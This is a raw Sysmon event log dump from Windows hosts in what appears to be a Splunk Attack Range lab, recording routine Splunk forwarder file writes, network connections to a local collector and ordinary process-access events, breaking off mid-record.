07:57:38.775{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50111-false10.0.1.12-8000- 23542300x800000000000000082711Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:42.877{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E498D484354DD851C242B37FD18A1188,SHA256=1341A0FCE7F50AD24579BE630E05E66DD071037CD8B25D5DFDD51177EC31C865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104789Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:42.988{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6589E813DA762D61EFE67BA7D6F783D6,SHA256=38C04C9C4C281C9FD7E05D09D82705D86380D537350CB074BB4723820A3C3DD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082712Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:43.877{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3E44D903D598F34EF19539B5EF15F17,SHA256=3FEEAAE735805E7A1AB293EA38248C88E314A73006C232EFCA98FCEFE416B5B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082713Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:44.940{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5830DB0BED8DA11FECAF24685FCBAF96,SHA256=2D6B871DD26511028DA952FBA165F2247E5EE518FA04BD00C8A158259E00FD4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104790Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:44.019{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F94D459C8C469EEDF694BF0FF83712A1,SHA256=FCF5EAAF5A69ACCFCCF0A872B276CC4528A9C8EB48C095D497768C996E0F057C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082714Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:45.940{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F80F7163C752ACF979404577853EE201,SHA256=A9288801760AE732BC488F97325FCF3D951B5113D25E0CEDA6105B73D4BDA74F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104792Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:44.320{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51727-false10.0.1.12-8000- 23542300x8000000000000000104791Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:45.035{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCA587758FE6C848BDAE94F9FAF1874F,SHA256=EA3153F9A4CA90EB6C746F8B65E708A9F5F99B1864CA41BAB07770E376352310,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104793Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:46.066{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5AFEAA51BB87BC316A8B0D8BB7AAE5,SHA256=F9F3AF4931549F5176A7684D3C3BBBC1A9A8E5A347F3D984F1B322AA62FCA5A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082716Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:44.572{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50112-false10.0.1.12-8000- 23542300x800000000000000082715Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:47.034{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1285162B303A415CE27A2D9EF4CA5B13,SHA256=A99B0C10AE1D137748A834C7BD1FC4762E21C26D47A0D27906A9CAB969547442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104794Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:47.082{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4DE17171BB58F8FB6B7DFCEBA71EDBB,SHA256=805F05ACBECFB13CA94D1275791A2405B91E6488946951EBD4CCF35A325658B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082717Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:48.174{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B46BBDD7A930763EBB879E16C38945C8,SHA256=119ADBD8CA26CD7E8FC3FD5FABF8038DBA342DE022AAE6BAFACFEDE7FCDFB1AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104795Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:48.082{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99D8F251E76092272255587D1BEACF09,SHA256=72389B7DAE39E7FE5EB1735F72FEE3CB9B8331CA39B0E6D2B29AE16DB53C0631,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082718Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:49.268{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B79DADB5C037795CC9B9BF6E4EAD3BEF,SHA256=CB7A04C11C169E9F23CA25D4E85F9AE2619AFAD7D01A63B4FC5EA8293B69D48B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104796Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:49.081{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60486D7D5CCDD400B67775C2263B4199,SHA256=0DFB3D2200C03D171124978C657A6A5EAE9F3A91A32271A9A7043FA89B487EEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082719Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:50.393{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D7E3383344C8527281DBBEB24CD6B2,SHA256=0FDC367F541372013F55A01F4BED1BE00B29A2325B4E32C0F36F82828C46B391,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104798Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:49.476{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51728-false10.0.1.12-8000- 23542300x8000000000000000104797Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:50.081{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01442091AC258FC9B87C6593E0EF1EB3,SHA256=9DA5D20FE84DD1DFCFD560F44AD85B964FD932777306CF2632C516B06F8C04AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082721Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:49.713{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50113-false10.0.1.12-8000- 23542300x800000000000000082720Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:51.440{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=016F09E4D2FA12FE8B9881D10282317B,SHA256=372E1412B6F64AE8D8765B981EF7E0A37FC34DF159A65D8C896207EAABD64B78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104802Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:51.691{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104801Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:51.691{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104800Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:51.691{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104799Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:51.097{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8616B1E5ADFC3B2A4DE7ACE5DC18B960,SHA256=209B5EBB4165869B0DFC9C74C796B986F4E460A4FA4F8B5CD5B34EC90EFFB8E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082722Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:52.628{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C8A074525D9A417540721D327B53B10,SHA256=9B7A1915755FD9038C9A85E2217A94CE803DC629250D14CB2DC3154B252A5DD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104803Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:52.097{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1204D21022662B38D5F0B905E9D9DCF9,SHA256=D4A1A4A87CAE075060E78B0BEC1F2C3F8B68871A778E97C3800C3733061035A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082723Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:53.643{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3EFD9D7BB7F3CEEDF884E6742F1B895,SHA256=2531E2C32324DB03267E7DBF212BCC8E924DA276ECA1F07AE5B8E2DE734C6941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104804Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:53.097{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E04BF3F61AD17AB38A11865514C3B885,SHA256=B8F1D5B12A173333555EB1E0A22BB71C9F91300C92770304CF4B49A7C43D9241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082724Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:54.643{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF40CEB7BE0DA636DA4CF332D0993112,SHA256=CA4CC3AFCC7887B862925C487133E18C43E5133FAFEDEB0D833FB0ADC4159BA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104805Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:54.097{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D69207D70BA445259802B9A3FF7F5D78,SHA256=95F80039B8C56CFEE9714C7FE231E61A7D19E20DACC267302477A9C9AC7374E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082725Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:55.674{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=113F1B0B2E8E71B984DC7891C358E589,SHA256=ACDF8B1A8F650A913AF11EFAF9835705F5E0BF20B99566B4D30FFA8005986868,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104807Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:55.831{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=10E5AEF4925E95CDC0E4F684F1571C96,SHA256=973A7D68A236CC863EE054166B820764BE33322A5885EB16D2562FFB68C27F84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104806Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:55.097{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBEE6F05EC3EE5E7436B0D59F4743A8F,SHA256=967AC32A38F239BFDE1D1595137B120BE4A445140202006F1B5CDEE688E681A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082727Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:54.791{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50114-false10.0.1.12-8000- 23542300x800000000000000082726Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:56.724{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDB1A8584BE6E649A1D92326676E5FA0,SHA256=BDFE02C9A299C49C24D3FE52C4802C356B2620BA7D605B0DA756024C2B822E0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104810Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:56.944{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104809Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:55.398{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51729-false10.0.1.12-8000- 23542300x8000000000000000104808Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:56.097{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C2FC3E195BF83A9B6DF506A82526944,SHA256=AA765F1D1D63DB4D50D15ED4DF44BCB74AC5168B9E740C14F8C126E52455849E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082728Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:57.724{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A095D4188597C40F04E495FE6446BE08,SHA256=A390121D079822B55BB8D90F0247BC532991E6070AC9B2DC892F85D94B8B3959,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104811Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:57.115{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B77425CD155E47F428B60B079C7F4C4,SHA256=572FFD52C2270C4FF476EAD7830FCE1D853303A5A347CE5C75E4BD8FF3EE5A78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082742Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B406-615A-7901-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082741Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082740Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082739Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:58.990{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082738Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 